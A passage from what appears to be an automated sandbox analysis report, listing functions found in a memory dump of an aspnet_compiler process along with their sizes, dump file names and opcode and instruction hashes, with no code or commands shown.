                                                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                      • Instruction Fuzzy Hash: A2815371A002099FDF5DCF69C890ABEBBB6FF84310F1885A9D9259B385DB74E901CB50
                                                      Function 01AEE284 Relevance: .2, Instructions: 212COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a344f169468b429762ea7246f8b0abed5a0aa9d10d5cbca4306b2d7a16e0d1c7
                                                      • Instruction ID: 598d518fdbeaaaab0c20b5a37a3711ad3326194c1a11ce2fade5abfbd8ac64a3
                                                      • Opcode Fuzzy Hash: a344f169468b429762ea7246f8b0abed5a0aa9d10d5cbca4306b2d7a16e0d1c7
                                                      • Instruction Fuzzy Hash: FA817E71A0061AAFDB25CFA9C984BEEBBF9FF48314F14442AE559A7250D730AC45CB60
                                                      Function 01ACC640 Relevance: .2, Instructions: 206COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3cdcce4730260469ee9f8c640e9d7cb08d4d56675502d7fa7cdb4632551bf4a6
                                                      • Instruction ID: 0293d68a7c4f59416f808b970e400929fab561e10792905bc556de1547d2e256
                                                      • Opcode Fuzzy Hash: 3cdcce4730260469ee9f8c640e9d7cb08d4d56675502d7fa7cdb4632551bf4a6
                                                      • Instruction Fuzzy Hash: 9D71D1B5D00629DBCB29CF59C9907BEBBB0FF48B10F99415EE856AB358D3349800CB90
                                                      Function 01B647A0 Relevance: .2, Instructions: 202COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc183d85abbb87e3ce22e23c38d9267c055ad12a6ece07c45dae79b1e2f21ca6
                                                      • Instruction ID: 6963e833d24323bda1078df668cae617287dbc08e18f64827c20a622024be297
                                                      • Opcode Fuzzy Hash: bc183d85abbb87e3ce22e23c38d9267c055ad12a6ece07c45dae79b1e2f21ca6
                                                      • Instruction Fuzzy Hash: AC71B4B1900605EFDB28CFA9DA41A9EBBFCFFA4340F44419AE654A7298D735C940CF54
                                                      Function 01AC260B Relevance: .2, Instructions: 201COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48783e4dfa36c33021ca4f9bfff746acc1083354edd3d2ad312bfbce70af6638
                                                      • Instruction ID: 0a95347e891eba167b8e8e652e102f86dc0b28827a9a66f3b7c680cb0530511b
                                                      • Opcode Fuzzy Hash: 48783e4dfa36c33021ca4f9bfff746acc1083354edd3d2ad312bfbce70af6638
                                                      • Instruction Fuzzy Hash: E471D0356042428FD716DF2CC480B6AB7E5FF84710F0985AEE899CB352DB78D845CBA1
                                                      Function 01B3035C Relevance: .2, Instructions: 198COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                      • Instruction ID: a88496d2f4d3e0aab06816e22784e51410249c06749e97dcdfa377b109113857
                                                      • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                      • Instruction Fuzzy Hash: 32716D71A00609EFDF15EFA9C984AEEBBB8FF98700F104569E505E7290DB30EA15CB50
                                                      Function 01B462A0 Relevance: .2, Instructions: 198COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4ed44213b4e9b34a5549cb22c70b4cf0a4c5620bc7501bab8bdc43de7b3a0eaa
                                                      • Instruction ID: 827ed4185a2e17c93e18735b60f7a65e83fe576700a1ba6c85712492e20b45a4
                                                      • Opcode Fuzzy Hash: 4ed44213b4e9b34a5549cb22c70b4cf0a4c5620bc7501bab8bdc43de7b3a0eaa
                                                      • Instruction Fuzzy Hash: 0B710232200701AFEB3ADF18C984F6ABBA6EF41720F14859CE655972A0D774E944EB50
                                                      Function 01AB8AA0 Relevance: .2, Instructions: 197COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7462aa2d7f697e2aff33462977040424ac591118ed5a0d2cd630a8b967c8c20e
                                                      • Instruction ID: 7de62a90b9d3692672525bedfc86c274af338ec474154a8b4ab62f214053da97
                                                      • Opcode Fuzzy Hash: 7462aa2d7f697e2aff33462977040424ac591118ed5a0d2cd630a8b967c8c20e
                                                      • Instruction Fuzzy Hash: 4C819072A04345CFDB28CF9CD584BEDB7B9EB48310FAA41ADD9046B286D7759D40CB90
                                                      Function 01B88324 Relevance: .2, Instructions: 192COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7ec6fd6c023581763888fece98c64d5301c1765c1b65bc9e86ff0aeb9fa58eb
                                                      • Instruction ID: 870caada9641c07e4b088f45495280ecc677036086cb07ac5f3d15639f0c61b3
                                                      • Opcode Fuzzy Hash: a7ec6fd6c023581763888fece98c64d5301c1765c1b65bc9e86ff0aeb9fa58eb
                                                      • Instruction Fuzzy Hash: 88710A71E0020AAFDF15DF94C981FEEBBB9FF04750F504269F621A6290D774AA05CBA0
                                                      Function 01B6A250 Relevance: .2, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 46d278a52730fc8e8d25c8ac72642653bc0628bfc48fe07ac16667f1b09c9761
                                                      • Instruction ID: 469fc695209ae467a5c52835a7c470c78ea8238d2bbf134fc5aea26f5fce78d7
                                                      • Opcode Fuzzy Hash: 46d278a52730fc8e8d25c8ac72642653bc0628bfc48fe07ac16667f1b09c9761
                                                      • Instruction Fuzzy Hash: 0651CF72504712AFDB15DA78C894B5BBBECEBD8750F0009A9BA40EB150D778ED05C7A2
                                                      Function 01B58350 Relevance: .2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44817ba1a4536406c4823e780f4ebd969573c113deec48f766bc99efe4b2b5b6
                                                      • Instruction ID: be8ef505c2c12eeb37cc065aa7997f0ef5136deb594a0d96ac7d8d27da2f3ec2
                                                      • Opcode Fuzzy Hash: 44817ba1a4536406c4823e780f4ebd969573c113deec48f766bc99efe4b2b5b6
                                                      • Instruction Fuzzy Hash: 8E51DE709007059FDB69CF5AC880B6BFBF8FF54710F10465EEA52576A1C7B0A545CB50
                                                      Function 01AEE443 Relevance: .2, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e864d3952e8d806791593e5274d3f281208a0d5a3524c4f3a800358a6e499eb2
                                                      • Instruction ID: 4d03e22b1ec1f3ab02054ac1fffdde8276d0ee361b1ba0bd4d8465f8b6bd8368
                                                      • Opcode Fuzzy Hash: e864d3952e8d806791593e5274d3f281208a0d5a3524c4f3a800358a6e499eb2
                                                      • Instruction Fuzzy Hash: E6519E31200A15EFCB22EFAACA84EAAB7F9FF14744F40046EE50597261D734E944CB60
                                                      Function 01B54180 Relevance: .2, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08fc8a4b25bf0f49e3a60fb0e16e107fef56b12d51f68ec53295bbfedd139179
                                                      • Instruction ID: 0717cb5031704b8139eb7b6c4a639871458ef1a5da40cfa0a4711c54ecd70a10
                                                      • Opcode Fuzzy Hash: 08fc8a4b25bf0f49e3a60fb0e16e107fef56b12d51f68ec53295bbfedd139179
                                                      • Instruction Fuzzy Hash: 045136716083029FD798DF29C980A6BBBE5FBC8204F44497DF999C7261E730D946CB52
                                                      Function 01AD45B1 Relevance: .2, Instructions: 156COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction ID: f50bb2a4b920a751153a068aa3d4e5b05a99b4a6734d9c195f551125c098c4e0
                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction Fuzzy Hash: EC51AF71E0061AABDF15DF98C540BEEBBB5EF49750F054069EA06EB640E734DE44CBA0
                                                      Function 01B3E9E0 Relevance: .2, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                      • Instruction ID: b023c32aca32e355945f9daa4ad2834ccc908c4e7be664a8e7cc1af530cb649f
                                                      • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                      • Instruction Fuzzy Hash: AB51B971D0020AEFDF2A9B94C9C0BAEBB75EB80314F154696E611A7190E730DD558BA0
                                                      Function 01B78B28 Relevance: .2, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 401b7f0dd59e7d002a046d4bd017b76aee0ca21e6e72098847195ed9999484b4
                                                      • Instruction ID: a7f6b6fee4a04b99b29dadc8cfaaec1142a8f751672bcdb9faa7ac019007815e
                                                      • Opcode Fuzzy Hash: 401b7f0dd59e7d002a046d4bd017b76aee0ca21e6e72098847195ed9999484b4
                                                      • Instruction Fuzzy Hash: FB41F7707016019BEB2DDB2DC898F7BBB9AEF94220F088299E975C7390DB31D841C691
                                                      Function 01B3CBF0 Relevance: .1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42bad84aeea878d6c3958ffce80735be552f1f3f699e33055037484d18138a73
                                                      • Instruction ID: a9f68e2417738242ba34785bb1b9c76cd36a12d2928980c69184794236c11fe2
                                                      • Opcode Fuzzy Hash: 42bad84aeea878d6c3958ffce80735be552f1f3f699e33055037484d18138a73
                                                      • Instruction Fuzzy Hash: 21519CB190021ADFCB24DFA9C98499EBBB9FF88314B95455AE505B3301DB34AD11CFD0
                                                      Function 01AEA430 Relevance: .1, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70c7f97cf10db960cd38e7084ddabd06c6b65cc4f9a83f640463c1ccfbb4310f
                                                      • Instruction ID: d76caf7bf24d24e467622fe15bf91dccf6cc0eaa00bb25d1da544e806176d7ed
                                                      • Opcode Fuzzy Hash: 70c7f97cf10db960cd38e7084ddabd06c6b65cc4f9a83f640463c1ccfbb4310f
                                                      • Instruction Fuzzy Hash: 984137717403129BDB3EEF68D986FAA77B4EB94708F44006DFE069B246D7719804D7A0
                                                      Function 01B7A9D3 Relevance: .1, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                      • Instruction ID: fc375f1d05ebdaa4cae4874aa8656483ee7eddeb173458f571fa92fca24d6368
                                                      • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                      • Instruction Fuzzy Hash: 0541E9716007169FDB6DDF78C980A6EB7A9FF90210B0946AEE96287340EB30ED14C790
                                                      Function 01AE01F8 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e8b97293308fb3f90b97b2cab68ae4958d3154dc0a4023fe4a6d956da28939a
                                                      • Instruction ID: bf41cce94981cc8d921ac655018adba91b9194349f3ebcefa4d4032a01e743aa
                                                      • Opcode Fuzzy Hash: 8e8b97293308fb3f90b97b2cab68ae4958d3154dc0a4023fe4a6d956da28939a
                                                      • Instruction Fuzzy Hash: 5D41DD32A0121A9BDB15DF98C644AEEBBF4FF48700F18816AF915F7240D7B49C42CBA4
                                                      Function 01ADEBFC Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff59d1138320aadd76e236b3d06e23770e05082d03889921d88af86c885c3bc9
                                                      • Instruction ID: 115faa958165001c2ee7c675e40fa43f20015064d1bbc4d374a94ac933cf21ba
                                                      • Opcode Fuzzy Hash: ff59d1138320aadd76e236b3d06e23770e05082d03889921d88af86c885c3bc9
                                                      • Instruction Fuzzy Hash: 1541AF712047029FDB24DF28C984A6BB7F9FF88214F45486EE557CB215EB35E849CB90
                                                      Function 01AF2750 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction ID: 9f998bd27bb9f99d702bae34b7a622dbe9801f3f4a37a0735d16271c84350220
                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction Fuzzy Hash: E3516C75A00625CFCB19CFA9C480AADF7B2FF88710F2481A9D929A7751D730EE45CB90
                                                      Function 01AB6154 Relevance: .1, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2e5c2f8704afd03d68a600eeae80c2a0b3b351ec483225dd78e65bcb521377b
                                                      • Instruction ID: befe837f54c8ee11db17d66950209993a8be16e54e1ad70e3fce978fdb18bdc5
                                                      • Opcode Fuzzy Hash: c2e5c2f8704afd03d68a600eeae80c2a0b3b351ec483225dd78e65bcb521377b
                                                      • Instruction Fuzzy Hash: 4851E6B0D00246DBEB299B68CD40BE8BBB5FF15314F5882EAE519972C2E73499C1CF40
                                                      Function 01AB0BCD Relevance: .1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1504a9a5e4ccf0a54f1467bc3082cf54ae393c115c3baf4fd4deee86383fa869
                                                      • Instruction ID: 67e9a9ca4bde115c35f3b7304483f1ae316e076e22d1311c7afa8f01f2d7b072
                                                      • Opcode Fuzzy Hash: 1504a9a5e4ccf0a54f1467bc3082cf54ae393c115c3baf4fd4deee86383fa869
                                                      • Instruction Fuzzy Hash: A7418571A00268DBDB21DF68CA80BEE7BB8EF45750F0505A9E908AB242D774DE84CF51
                                                      Function 01B7866E Relevance: .1, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction ID: fcce3889ff3aa68e4da09e66478dda83c30348049da07c1e36a6847f33601e34
                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction Fuzzy Hash: 4B418575B00105ABDF19DF99CC98AAFBBBAEF88610F1440A9E915E7351DB70DD0187A0
                                                      Function 01AB0887 Relevance: .1, Instructions: 128COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86355254d38bc14d0b77a24923cf3113e661420b6900dd0dfd2b9303880ec3be
                                                      • Instruction ID: c456defe6b70f50b71a4ca9ea86ef69e7a370d4bcbf7eb9c62e783666a7a1a7c
                                                      • Opcode Fuzzy Hash: 86355254d38bc14d0b77a24923cf3113e661420b6900dd0dfd2b9303880ec3be
                                                      • Instruction Fuzzy Hash: 5841E2B06007819FE325CF68C680A63BBF9FF48314B148A6EE557C7A52E730E845CB90
                                                      Function 01ADA470 Relevance: .1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b45ae9783807f4d444f3c971b28b59a6706a0a5cb4ad3a5a3c267e07f62a3ee7
                                                      • Instruction ID: 3c14a9b021a4a1167acea97a770635a893df3e34d039e16f0b402888a331eec6
                                                      • Opcode Fuzzy Hash: b45ae9783807f4d444f3c971b28b59a6706a0a5cb4ad3a5a3c267e07f62a3ee7
                                                      • Instruction Fuzzy Hash: 76411132900604CFDF25EF68C5847ED7BB4FF08310F980599D412AB295DB75D900CBA0
                                                      Function 01AB8BF0 Relevance: .1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aa496a1ea84045c237fb142b2e5e6aae721d47f3beb6e206e09a10b5c71701ca
                                                      • Instruction ID: 7366283f3f8e0ad7c4060531bfbcdefa76fef64f3c9a46a7a4ae679e3f225191
                                                      • Opcode Fuzzy Hash: aa496a1ea84045c237fb142b2e5e6aae721d47f3beb6e206e09a10b5c71701ca
                                                      • Instruction Fuzzy Hash: A1412671900242CFD724AF4CC9C1AEABBBDFF95704F69802ED5049B25AD77AD801CB90
                                                      Function 01AA8918 Relevance: .1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d9ca2ba8d8a7e35ef6dcc8faef49c3e65ccea0248acf912a071b034ca0bb7e6e
                                                      • Instruction ID: 607923711911ec82a996612ebbc05a0bfe93501ac5791db9631c9ad4732c841e
                                                      • Opcode Fuzzy Hash: d9ca2ba8d8a7e35ef6dcc8faef49c3e65ccea0248acf912a071b034ca0bb7e6e
                                                      • Instruction Fuzzy Hash: 0B416A315087069ED312DF69C940A6BFBE8EF88B54F44092EF984D7250E734DE058B93
                                                      Function 01AAA020 Relevance: .1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                      • Instruction ID: 704f041475c190599373baccd1ccec3eb3a8f6ef3c600d64a4621f2e0288d8fe
                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                      • Instruction Fuzzy Hash: 03412C35A00211DBDB2BEF598550BBABFB1EB50764F9580AEE9459B280D7339D40CB90
                                                      Function 01AB09AD Relevance: .1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 810dc22f9d949e338a081096cf8a8fc5dff156f3d1a861fae636367e26844e35
                                                      • Instruction ID: 11935c09eccb62293366265d39fc90383383903a90a036425137c5d9a67fb64a
                                                      • Opcode Fuzzy Hash: 810dc22f9d949e338a081096cf8a8fc5dff156f3d1a861fae636367e26844e35
                                                      • Instruction Fuzzy Hash: C4415B71640641EFD725CF18C980BA6BBF8FF54714F248A6EE449CB292E771E941CB90
                                                      Function 01AE0710 Relevance: .1, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                      • Instruction ID: 216be7656d4844405ff17f2b051853f5939c603ac5b05e44d7294996a1b329b0
                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                      • Instruction Fuzzy Hash: D5413A71A00705EFDB25CFA8CA94AAABBF4FF18700B10496DE596D7650D370EA44CF50
                                                      Function 01AB262C Relevance: .1, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
